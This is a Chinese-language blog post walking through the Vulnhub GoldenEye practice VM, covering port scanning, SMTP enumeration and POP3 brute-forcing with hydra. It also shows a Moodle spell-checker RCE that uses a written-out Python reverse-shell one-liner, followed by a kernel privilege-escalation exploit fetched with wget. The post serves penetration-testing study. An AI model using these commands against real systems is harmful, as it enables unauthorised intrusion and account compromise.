

<!DOCTYPE html>
<html lang="zh-Hans" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="
CTF LIKE就很扯，少打
​            ——鲁迅
">
  <meta name="author" content="Shawn">
  <meta name="keywords" content="">
  
  <title>GoldenEye Writeup - P3aceSh4wn&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="P3aceSh4wn's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>peaceSh4wn's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Homepage
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archive
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Category
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Labels
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Homies
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.jpeg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="GoldenEye Writeup">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      Shawn
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-09-01 22:23" pubdate>
        September 1, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      31
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">GoldenEye Writeup</h1>
            
            <div class="markdown-body">
              <blockquote>
<p>CTF LIKE就很扯，少打</p>
<p>​            ——鲁迅</p>
</blockquote>
<a id="more"></a>

<h2 id="0x01-信息搜集"><a href="#0x01-信息搜集" class="headerlink" title="0x01 信息搜集"></a>0x01 信息搜集</h2><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-comment"># 扫描靶机地址</span><br><span class="hljs-string">nmap</span> <span class="hljs-string">-sn</span> <span class="hljs-string">-T5</span> <span class="hljs-number">192.168</span><span class="hljs-number">.206</span><span class="hljs-number">.1</span><span class="hljs-string">/24</span><br><br><span class="hljs-comment"># 扫描开启服务和端口</span><br><span class="hljs-string">nmap</span> <span class="hljs-string">-sV</span> <span class="hljs-string">-A</span> <span class="hljs-string">-p-</span> <span class="hljs-string">-T5</span> <span class="hljs-number">192.168</span><span class="hljs-number">.206</span><span class="hljs-number">.150</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>Host is up (0.00049s latency).<br>Not shown: 65531 closed ports<br>PORT      STATE SERVICE     VERSION<br>25/tcp    open  smtp        Postfix smtpd<br>|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,<br>|_ssl-date: TLS randomness does not represent time<br>80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))<br>|_http-server-header: Apache/2.4.7 (Ubuntu)<br>|_http-title: GoldenEye Primary Admin Server<br>55006/tcp open  ssl/unknown<br>|_ssl-date: TLS randomness does not represent time<br>55007/tcp open  pop3        Dovecot pop3d<br>|_pop3-capabilities: CAPA RESP-CODES TOP AUTH-RESP-CODE UIDL STLS USER SASL(PLAIN) PIPELINING<br>|_ssl-date: TLS randomness does not represent time<br>MAC Address: 00:0C:29:3F:27:D6 (VMware)<br>Device type: general purpose<br>Running: Linux 3.X|4.X<br>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4<br>OS details: Linux 3.2 - 4.9<br>Network Distance: 1 hop</p>
<p>TRACEROUTE<br>HOP RTT     ADDRESS<br>1   0.49 ms bogon (192.168.206.150)</p>
</blockquote>
<ul>
<li>能够看到开启4个端口，80（http）、25（smtp）、55007（pop3）、55006（ssl）</li>
</ul>
<ol>
<li><strong>浏览器访问一下80端口</strong></li>
</ol>
<p><img src="/2020/09/01/GoldenEye-Writeup/1.png" srcset="/img/loading.gif" lazyload alt><br>按照提示，让我们访问一下<code>/sev-home/</code>去登录</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/2.png" srcset="/img/loading.gif" lazyload alt><br>bp抓包分析后，发现传出参数是<code>username:password</code>的base64编码，可以爆破一波</p>
<ol start="2">
<li><strong>smtp 25端口</strong></li>
</ol>
<p>直接尝试nc连接，居然可以连接上</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/3.png" srcset="/img/loading.gif" lazyload alt><br>看一下支持的命令</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/4.png" srcset="/img/loading.gif" lazyload alt></p>
<p>SMTP枚举三把梭：</p>
<ul>
<li>msf</li>
<li>nmap</li>
<li>smtp-user-enum</li>
</ul>
<p>果然，msf还是最强那把梭，另外两把都没有扫出来东西</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/5.png" srcset="/img/loading.gif" lazyload alt><br>手工测试出来root也在范围之内，上面没有显示</p>
<p>下一步怎么走？</p>
<ul>
<li><p>枚举用户</p>
<ul>
<li>结合之前的登录信息，再用来爆破Authentication密码</li>
<li>这里选用的密码表是john的</li>
</ul>
</li>
</ul>
<p><img src="/2020/09/01/GoldenEye-Writeup/6.png" srcset="/img/loading.gif" lazyload alt><br>单线程py居然跑瘫了机子，SMTP无果</p>
<ol start="3">
<li><strong>POP3 55007端口</strong></li>
</ol>
<p>依旧采用nc连接，端口55007</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/7.png" srcset="/img/loading.gif" lazyload alt><br>使用<code>CAPA</code>命令查看server支持的操作，尝试手工测试，msf同步进行登录测试（太慢）</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/8.png" srcset="/img/loading.gif" lazyload alt><br>没有得到可用用户名和密码，登录失败，我这里猜测在pop server的某个账户中会隐藏重要信息</p>
<h2 id="0x02-漏洞挖掘与利用"><a href="#0x02-漏洞挖掘与利用" class="headerlink" title="0x02 漏洞挖掘与利用"></a>0x02 漏洞挖掘与利用</h2><p>CTF LIKE就是这么trick，不真实。翻看js源码，有一句叮嘱，出现用户名和密码，unicode转换到ascii，Boris首字母改小写</p>
<p>账密：<code>boris:InvincibleHack3r</code></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/9.png" srcset="/img/loading.gif" lazyload alt><br>顺利进入</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/10.png" srcset="/img/loading.gif" lazyload alt><br>GoldenEye的第二句话有重要信息</p>
<blockquote>
<p>Please email a qualified GNO supervisor to receive the online <strong>GoldenEye Operators Training</strong> to become an Administrator of the GoldenEye system</p>
</blockquote>
<p>我们需要发送一封email给主管来称为GoldenEye的管理员，那么下一步需要考虑如何利用SMTP和POP3，先尝试了用这个账密登录POP3，失败！</p>
<p><strong>重新理一下资料</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">发送:SMTP 25 得到账户名单<br>接收:POP3 55007 爆破失败，以下账密登录失败<br>账密 boris:InvincibleHack3r<br><span class="hljs-meta">#</span><span class="bash"> 提示发送邮件</span><br></code></pre></td></tr></table></figure>

<p>发送邮件动作可以完成，但是接收没有下文，POP3 msf爆破过慢，采用我们拿到的SMTP的用户名和<code>boris</code>用hydra或者medusa进行爆破</p>
<p>用户名文件<code>user.txt</code></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/11.png" srcset="/img/loading.gif" lazyload alt><br>wordlist采用比较短的<code>fasktrack.txt</code></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/12.png" srcset="/img/loading.gif" lazyload alt><br>hydra使用命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt -t 20 192.168.206.150 -s 55007 -I pop3<br><span class="hljs-meta">#</span><span class="bash"> 20线程，55007端口，pop3服务</span><br></code></pre></td></tr></table></figure>

<p>不到5分钟，爆破成功！</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/13.png" srcset="/img/loading.gif" lazyload alt><br>netcat登录pop3，输入账密<code>boris : secret1!</code></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/14.png" srcset="/img/loading.gif" lazyload alt><br>使用<code>list</code>命令，发现存在3封邮件，使用<code>retr 数字</code>依次阅读</p>
<p><strong>第三封邮件有点东西</strong></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/15.png" srcset="/img/loading.gif" lazyload alt></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs c">Return-Path: &lt;alec@janus.boss&gt;<br>X-Original-To: boris<br>Delivered-To: boris@ubuntu<br>Received: from janus (localhost [127.0.0.1])<br>        by ubuntu (Postfix) with ESMTP id 4B9F4454B1<br>        for &lt;boris&gt;; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)<br>Message-Id: &lt;20180425025235.4B9F4454B1@ubuntu&gt;<br>Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)<br>From: alec@janus.boss<br><br>Boris,<br><br>Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!<br><br>Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....<br><br>PS - Keep security tight or we will be compromised.<br></code></pre></td></tr></table></figure>

<p>Xenia是个可疑的名称</p>
<p><code>Attached</code>就是最终密码？还是附件的意思？</p>
<p>如果是附件的话，我们用python获取一波附件（这里也可以直接用邮件软件查看，配置好pop3和smtp服务）</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/16.png" srcset="/img/loading.gif" lazyload alt><br>啥也没找到，思路陷入僵局，求助walkthrough</p>
<ul>
<li>看到信件中的用户名，可以继续想到爆破，我们对root和natalya进行进一步爆破</li>
</ul>
<p><img src="/2020/09/01/GoldenEye-Writeup/17.png" srcset="/img/loading.gif" lazyload alt><br>拿到natalya的账密，root爆破无果</p>
<p><code>natalya : bird</code></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/18.png" srcset="/img/loading.gif" lazyload alt><br>第二封信件中拿到xenia账密</p>
<p><code>xenia : RCP90rulez!</code></p>
<p>同时得到新的路径信息，<code>severnaya-station.com/gnocertdir</code>，不过需要修改dns文件，对应上服务器的ip</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/19.png" srcset="/img/loading.gif" lazyload alt><br>windows改<code>C:\Windows\System32\drivers\etc\hosts</code>，Linux改<code>/etc/hosts</code></p>
<p>成功进入</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/20.png" srcset="/img/loading.gif" lazyload alt><br>输入账密，登录xenia</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/21.png" srcset="/img/loading.gif" lazyload alt><br>看下web指纹</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/22.png" srcset="/img/loading.gif" lazyload alt><br>Moodle系统，YUI库，PHP，Apache，Ubuntu</p>
<p>Google一下Moodle，存在的漏洞有XSS、RCE、SSRF、SQL注入等等，之后进一步翻翻searchexploit</p>
<ul>
<li>第一次接触moodle系统，里面的信息量很大，先到处翻一翻</li>
</ul>
<p>发现Message处存在交流信息</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/23.png" srcset="/img/loading.gif" lazyload alt><br>用户名是doak，继续尝试爆破</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/24.png" srcset="/img/loading.gif" lazyload alt><br>成功爆破，获得新账密</p>
<p><code>doak : goat</code></p>
<p>二话不说，登入pop3 server</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/25.png" srcset="/img/loading.gif" lazyload alt><br>moodle新账密</p>
<p><code>dr_doak :4England!</code></p>
<p>登入moodle，发现一个文件，遂下载下来</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/26.png" srcset="/img/loading.gif" lazyload alt><br>又是一波提示</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/27.png" srcset="/img/loading.gif" lazyload alt><br>上文告诉我们doak博士抓到了admin的登录明文账密，但是他不能直接告诉我们，现在我们需要下载一张名叫<code>for-007</code>的图片，既然是CTF-LIKE，那么就需要开启应对misc套路的狗招了</p>
<p>图片分析，先用notepad打开看看，发现没有啥信息；然后属性打开，发现标题存在base64编码</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/28.png" srcset="/img/loading.gif" lazyload alt><br>解码，得到<code>xWinter1995x!</code>，推测是密码</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/29.png" srcset="/img/loading.gif" lazyload alt><br>kali中使用exif和binwalk查看（没有可提取物）</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/30.png" srcset="/img/loading.gif" lazyload alt><br>现在的可疑用户名：<code>for James</code>，<code>ForJames</code>，<code>forjames</code>，<code>James</code>，<code>james</code>，<code>admin</code>, <code>adm1n</code>，大小写可能有差异，于是python构造好用户名fuzz，bp爆破</p>
<p>账密为<code>admin : xWinter1995x!</code>，登录之</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/31.png" srcset="/img/loading.gif" lazyload alt><br>后面经过一番查找和exp的直接利用，发现都存在问题，再次学习前辈walkthrough</p>
<ul>
<li>moodle学习管理系统存在远程代码执行漏洞，此次可以通过<code>Site administration -&gt; Server -&gt; System paths</code>中修改<code>Path to aspell</code>为python反弹shell代码，当在富文本编辑器中点击拼写检查时就会触发这段代码</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">python -c <span class="hljs-string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.206.142",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span><br></code></pre></td></tr></table></figure>

<p><img src="/2020/09/01/GoldenEye-Writeup/32.png" srcset="/img/loading.gif" lazyload alt><br>漏洞具体解释<a href="https://www.rapid7.com/db/modules/exploit/multi/http/moodle_cmd_exec" target="_blank" rel="noopener">如下</a></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/33.png" srcset="/img/loading.gif" lazyload alt></p>
<ul>
<li>可是当我操作的时候，发现点击拼写检测并不能触发</li>
</ul>
<p><img src="/2020/09/01/GoldenEye-Writeup/34.png" srcset="/img/loading.gif" lazyload alt><br><img src="/2020/09/01/GoldenEye-Writeup/35.png" srcset="/img/loading.gif" lazyload alt></p>
<ul>
<li>这继续陷入思考，当点击时代码未被触发，先想到是某些配置没有开启，但是自己对系统也不熟，必定要google一番</li>
</ul>
<p>想到的搜索关键词</p>
<p><code>moodle spell checker can&#39;t work</code>，<code>how to make spell checker work in moodle</code>，<code>how to use moodle spell checker</code>，<code>how to pentest with moodle spell checker</code>，<code>exploit moodle with spell checker</code></p>
<p>逐一检查之后并没有结果，于是仔细回看反弹shell代码处是否写错或者漏掉重要信息</p>
<ul>
<li>代码没有写错，但是发现之前漏掉了重要信息aspell，我们安装了吗？</li>
</ul>
<p><img src="/2020/09/01/GoldenEye-Writeup/36.png" srcset="/img/loading.gif" lazyload alt><br>结合之前做DC-1的经验，于是去侧边栏的<code>Site administration -&gt; Server -&gt; Plugin</code>查看下是否安装该插件，发现在Overview中没有aspell插件信息，可是也没有提供直接安装的接口或者点击按钮</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/37.png" srcset="/img/loading.gif" lazyload alt><br>继续google搜集信息</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/38.png" srcset="/img/loading.gif" lazyload alt><br>看一下如何在HTML编辑器中安装spell checker，得知aspell是一款GNU的拼写检测器，可是安装需要在服务器内部用<code>apt-get</code>进行，所以可以肯定这条路到底了，往回返看看别的路！</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/39.png" srcset="/img/loading.gif" lazyload alt><br>下面这条信息点醒了我，我们并不需要真正去安装spell checker，因为刚才的编辑器是富文本类型，可能很多插件已经集成到上面了。这么考虑，下一步就要将moodle中TinyMCE editor等富文本编辑器信息搜集。</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/40.png" srcset="/img/loading.gif" lazyload alt><br>把刚才google出来的所有<a href="https://scholarlms.net/tinymce-editor/" target="_blank" rel="noopener">编辑器信息</a>先看一遍，发现了有趣的东西，可谓字字珠玑</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/41.png" srcset="/img/loading.gif" lazyload alt><br>moodle已经不支持Google Spell，可是moodle默认又是Google Spell，所以我们的aspell点击不会成功。这里又说明了，只要能够看见aspell的system path，就说明aspell已经安装。下面就只需要按照提示完成spell engine的修改，路径是<code>Administration &gt; Site administration &gt; Plugins &gt; Text editors &gt; TinyMCE HTML editor &gt; Check spelling</code></p>
<ul>
<li>把默认的spell engine从Google Spell替换为PSpellShell</li>
</ul>
<p><img src="/2020/09/01/GoldenEye-Writeup/42.png" srcset="/img/loading.gif" lazyload alt><br>保存后，kali上设置好nc监听，找个富文本编辑器点击检查，getshell</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/43.png" srcset="/img/loading.gif" lazyload alt></p>
<h2 id="0x03-提权-amp-get-flag"><a href="#0x03-提权-amp-get-flag" class="headerlink" title="0x03 提权&amp;get flag"></a>0x03 提权&amp;get flag</h2><p>继续搜集信息，查看当前用户权限，系统版本</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/44.png" srcset="/img/loading.gif" lazyload alt><br>发现能用python，升完交互shell后，kali上searchexploit找提权exp</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/45.png" srcset="/img/loading.gif" lazyload alt><br>就采用第一个overlaf，本地gcc编译一波，本地python开启http server下面就想办法将其传到靶机上</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/46.png" srcset="/img/loading.gif" lazyload alt><br>继续在靶机上测试发现能使用wget，遂下载overlaf二进制文件，为其修改权限后执行，成功提权</p>
<blockquote>
<p>这里有点互相trick的感觉，我把靶机的gcc缺失问题给屏蔽掉了，一般来说需要从靶机wget到exp再本机编译，然后才会遇到没有gcc的问题，再改掉exp内部的编译命令，将gcc改成cc或者clang</p>
</blockquote>
<p><img src="/2020/09/01/GoldenEye-Writeup/47.png" srcset="/img/loading.gif" lazyload alt><br>下到<code>/root/</code>看flag</p>
<p><img src="/2020/09/01/GoldenEye-Writeup/48.png" srcset="/img/loading.gif" lazyload alt><br>拿到flag，访问<code>/006-final/xvf7-flag/</code></p>
<p><img src="/2020/09/01/GoldenEye-Writeup/49.png" srcset="/img/loading.gif" lazyload alt></p>
<h2 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h2><ul>
<li>真实场景下也会有程序员把重要信息遗留在js等静态文件中，思路要放开</li>
<li>反反复复信息搜集，爆破也是必要的，别操之过急</li>
<li>exp需要时可做适当修改</li>
</ul>
<h2 id="0x0N-参考资料"><a href="#0x0N-参考资料" class="headerlink" title="0x0N 参考资料"></a>0x0N 参考资料</h2><h3 id="SMTP"><a href="#SMTP" class="headerlink" title="SMTP"></a>SMTP</h3><p><a href="https://www.sqlsec.com/2017/08/smtp.html" target="_blank" rel="noopener">[浅显]SMTP协议25端口渗透测试记录(邮件伪造)</a></p>
<p><a href="https://hjyapple.github.io/2019/07/04/%E5%85%B3%E4%BA%8ESMTP%E6%9C%8D%E5%8A%A1%E7%9A%84%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" target="_blank" rel="noopener">SMTP各种返回值含义</a></p>
<p><a href="https://blog.csdn.net/sinat_36219858/article/details/71069515" target="_blank" rel="noopener">SMTP协议详解</a></p>
<p><a href="https://book.hacktricks.xyz/pentesting/pentesting-smtp" target="_blank" rel="noopener">HackTricks SMTP</a></p>
<p><a href="https://xz.aliyun.com/t/3799#toc-12" target="_blank" rel="noopener">深度文章（边缘）</a></p>
<p><a href="https://shahmeeramir.com/penetration-testing-an-smtp-server-cf91e4846101" target="_blank" rel="noopener">Penetration Testing an SMTP Server</a></p>
<h3 id="POP"><a href="#POP" class="headerlink" title="POP"></a>POP</h3><p><a href="https://resources.infosecinstitute.com/nmap-cheat-sheet-5-the-final-view-of-a-ninja-pentester/" target="_blank" rel="noopener">nmap advanced skills</a></p>
<p><a href="https://book.hacktricks.xyz/pentesting/pentesting-pop" target="_blank" rel="noopener">HackTricks POP</a></p>
<h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p><a href="https://medium.com/egghunter/goldeneye-1-vulnhub-walkthrough-f31d80a5267b" target="_blank" rel="noopener">GoldenEye: 1 | Vulnhub Walkthrough</a></p>
<p><a href="https://blog.csdn.net/adminuil/article/details/103824141" target="_blank" rel="noopener">GoldenEye靶机渗透</a></p>
<p><a href="https://www.cnblogs.com/heguoze/p/12052353.html" target="_blank" rel="noopener">vulnhub之GoldenEye-v1靶机</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%89%93%E9%9D%B6/">打靶</a>
                    
                      <a class="hover-with-bg" href="/categories/pentest-training/">pentest training</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Vulnhub/">Vulnhub</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/09/04/Vulnhub-SickOs1-2-Writeup/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Vulnhub SickOs1-2 Writeup</span>
                        <span class="visible-mobile">Pre</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/04/01/Vulnhub-Kioptrix-1-Writeup/">
                        <span class="hidden-mobile">Vulnhub Kioptrix 1 Writeup</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



